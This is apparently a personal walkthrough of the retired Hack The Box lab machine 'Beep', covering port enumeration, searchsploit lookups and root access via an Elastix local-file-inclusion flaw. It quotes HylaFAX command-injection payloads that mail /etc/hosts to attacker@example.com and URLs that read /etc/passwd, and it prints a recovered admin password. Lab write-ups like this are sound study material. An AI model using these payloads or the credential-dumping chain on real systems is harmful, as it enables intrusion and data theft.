Beep # ENUMERATION NMAP: - 22: OpenSSH 4.3 (protocol 2.0) - 25: Postfix smtpd - 80: Apache httpd 2.2.3 - 110: Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 - 111: rpcbind 2 (RPC #100000) - 143: Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 - 443: ssl/https? - 877: 1 (RPC #100024) - 993: Cyrus imapd - 995: Cyrus pop3d - 3306: MySQL (unauthorized) - 4190: Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap) - 4445: upnotifyp? - 4559: HylaFAX 4.3.10 - 5038: Asterisk Call Manager 1.1 - 10000: MiniServ 1.570 (Webmin httpd) SEARCHSPLOIT: kali@kali:~$ searchsploit imapd -------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------------------------------- --------------------------------- Cyrus imapd 2.2.4 < 2.2.8 - 'imapmagicplus' Remote Overflow | linux/remote/903.c kali@kali:~$ searchsploit hylafax -------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------------------------------- --------------------------------- Hylafax 4.0 pl2 Faxsurvey - Remote Command Execution | unix/remote/20462.txt Hylafax 4.1.x - HFaxD Format String | linux/remote/23371.c Hylafax 4.1/4.2 (Multiple Scripts) - Remote Command Execution | linux/remote/27032.txt - the Hylafax ones seem to use the fax service (makes sense) to exploit ================== EXPLANATION Hylafax 27032.txt ====================== kali@kali:/usr/share/exploitdb/exploits/linux/remote$ cat 27032.txt source: https://www.securityfocus.com/bid/16151/info HylaFAX is vulnerable to multiple arbitrary command-execution vulnerabilities. This issue is due to a failure in the application to properly sanitize user-supplied input. These vulnerabilities allow an attacker to execute arbitrary commands in the context of the affected application. Successful exploitation may facilitate a compromise of the underlying system. sendfax -d "411;number=\`cat /etc/hosts\`" /etc/hosts sendfax -f "\`cat /etc/hosts|mail -s hosts attacker@example.com\` " -d 411 /etc/hosts sendfax -d "@411\";cat /etc/hosts|mail -s hosts attacker@example.com;" /etc/hosts ================== EXPLANATION Hylafax 20462.txt =================== kali@kali:/usr/share/exploitdb/exploits/unix/remote$ cat 20462.txt source: https://www.securityfocus.com/bid/2056/info Hylafax is a popular fax server software package designed to run on multiple UNIX operating systems. Unpatched version of Hylafax ship with an insecure script, faxsurvey, which allows remote command execution with the privileges of the web server process. This can be exploited simply by passing the command as a parameter to the script - see exploit. Consequences could include web site defacements, exploiting locally accessible vulnerabilities to gain further privileges, etc. http://target.host/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd # ENUMERATION Found a Webmin install on port 10000 - source code reveiled nothing # SEARCHSPLOIT kali@kali:/usr/share/exploitdb/exploits/unix/remote$ searchsploit webmin -------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------------------------------- --------------------------------- DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal | cgi/webapps/23535.txt phpMyWebmin 1.0 - 'target' Remote File Inclusion | php/webapps/2462.txt phpMyWebmin 1.0 - 'window.php' Remote File Inclusion | php/webapps/2451.txt Webmin - Brute Force / Command Execution | multiple/remote/705.pl webmin 0.91 - Directory Traversal | cgi/remote/21183.txt Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing | linux/remote/22275.pl Webmin 0.x - 'RPC' Privilege Escalation | linux/remote/21765.pl Webmin 0.x - Code Input Validation | linux/local/21348.txt Webmin 1.5 - Brute Force / Command Execution | multiple/remote/746.pl Webmin 1.5 - Web Brute Force (CGI) | multiple/remote/745.pl Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit) | unix/remote/21851.rb Webmin 1.850 - Multiple Vulnerabilities | cgi/webapps/42989.txt Webmin 1.900 - Remote Command Execution (Metasploit) | cgi/remote/46201.rb Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit) | linux/remote/46984.rb Webmin 1.920 - Remote Code Execution | linux/webapps/47293.sh Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit) | linux/remote/47230.rb Webmin 1.x - HTML Email Command Execution | cgi/webapps/24574.txt Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl) | multiple/remote/2017.pl Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP) | multiple/remote/1997.php -------------------------------------------------------------------------------- --------------------------------- ================== EXPLANATION Webmin 23535.txt =================== kali@kali:/usr/share/exploitdb/exploits$ cat cgi/webapps/23535.txt source: https://www.securityfocus.com/bid/9394/info A problem has been identified in the handling of input by scripts packaged with the DansGuardian Webmin Module. Because of this, it is possible for a remote to gain access to potentially sensitive information. https://www.example.com:10000/dansguardian/edit.cgi?file=[FILE] # ENUMERATION Google Elastix, which was the first page that showed up... CVE - N/A - https://www.exploit-db.com/exploits/37637 CVE 2012-4869 - https://www.exploit-db.com/exploits/18650 # EXPLOIT The first CVE - N/A did't do anyting... only errors. The second CVE 2012-4869 revealed a massive amount of data. I pasted that into a text file and ran a sed command (sed 's/#/&\n/g' elastix_LFI.txt) to separate lines by '#' # FINDING AMPMGRUSER=admin AMPMGRPASS=jEhdIekWmdjE These credentials worked on the login page. I tried to SSH into the machine using the credentials, but no joy. Looks like it requires a key exchange. kali@kali:~/HTB/RETIRED/Beep$ ssh admin@10.10.10.7 Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 Googl'd the error and got some legacy SSH instructions. Then changed the command to: $ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 root@10.10.10.7 There were some other passwords within that file, but they didn't work. Neither did trying to SSH with username admin. Root, and password above worked. PWND!